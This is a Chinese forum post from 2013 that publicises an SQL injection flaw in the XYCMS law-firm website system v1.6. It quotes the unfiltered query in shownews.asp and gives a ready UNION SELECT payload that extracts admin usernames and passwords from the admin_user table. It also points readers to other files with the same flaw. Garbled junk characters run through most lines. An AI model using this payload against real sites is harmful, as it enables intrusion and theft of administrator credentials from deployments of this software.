前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似0 T) h, L2 K. h2 C5 @
& A8 i& L1 H% H7 \ U/ h+ e5 y; Z
淫荡分割线9 j! \/ H! v2 H- f
--------------------------------------------------------
6 C* f' H" z S( X" k3 S. R- ?7 ^9 L 8 ]. C' B& X& W: Z3 @8 Y# V
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)' j* Q9 J3 D7 ?$ k, B. y9 i7 b
源码地址:http://down.chinaz.com/soft/29233.htm
- P" e( N' @4 f8 g: }2 J' o& R5 } 3 I) m; ]3 m8 v1 t
漏洞文件:shownews.asp6 S. a2 M0 s, y! F; q% `
漏洞代码:7-13行! G w* z3 N2 H( }) `
, l* E: y& B' |6 o: v
" F2 H7 w/ D3 j* U1 P/ y<%
# P D2 d# I. k3 B% N, D$ C: uid=request.QueryString("id")7 C) T8 r% U4 T, O
8 u0 ~0 i, Y3 `set snews=server.createobject("adodb.recordset") 3 h0 ~* t! q1 w1 c$ H
exec="select * from [news] where id="&id7 C V, h6 d5 Q! z5 X
snews.open exec,conn,1,1
& C" }5 o& X9 \& w! F! @8 Q7 ^%>
' s- _& C& y9 a: }) Q
+ U& |; D; A" z# `# {% w4 h
! q+ p# z" P! B J什么过滤都没有 直造成注入3 S7 M/ F/ d* w% a8 e' v: e
# ~- H0 g% q! F- y t/ m1 M$ b" J注入点:http://127.0.0.1:99/shownews.asp?id=xx
6 e: R4 I3 y; F $ O S' O6 j) {/ w: h
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找& c5 ^8 U$ L4 O
1 p" g3 Y' ]7 G0 Q4 S/ m
% q0 N- i' a' n
exp: union select 1,admin,password,4,5,7 from admin_user
4 X( x7 z' E; m: k3 J4 r" [4 w2 s7 Q) t3 q2 {2 \# q$ Y( Y+ B% W
|
发表于 2013-4-4 17:28:12
收藏
支持
反对